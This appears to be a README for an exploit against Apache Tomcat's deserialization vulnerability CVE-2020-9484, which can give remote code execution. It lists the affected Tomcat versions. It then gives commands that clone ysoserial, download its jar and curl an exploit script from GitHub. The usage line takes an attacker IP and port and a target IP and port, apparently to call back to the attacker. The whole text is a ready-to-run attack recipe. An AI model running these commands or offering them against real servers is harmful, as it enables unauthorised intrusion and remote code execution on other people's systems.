Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE
Affected versions:
- Apache Tomcat 10.x < 10.0.0-M5
- Apache Tomcat 9.x < 9.0.35
- Apache Tomcat 8.x < 8.5.55
- Apache Tomcat 7.x < 7.0.104
git clone https://github.com/frohoff/ysoserial
cd ysoserial/
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
curl -s https://raw.githubusercontent.com/d3fudd/CVE-2020-9484_Exploit/main/exploit.sh > exploit.sh
exploit.sh [your IP] [your port] [target IP] [target port]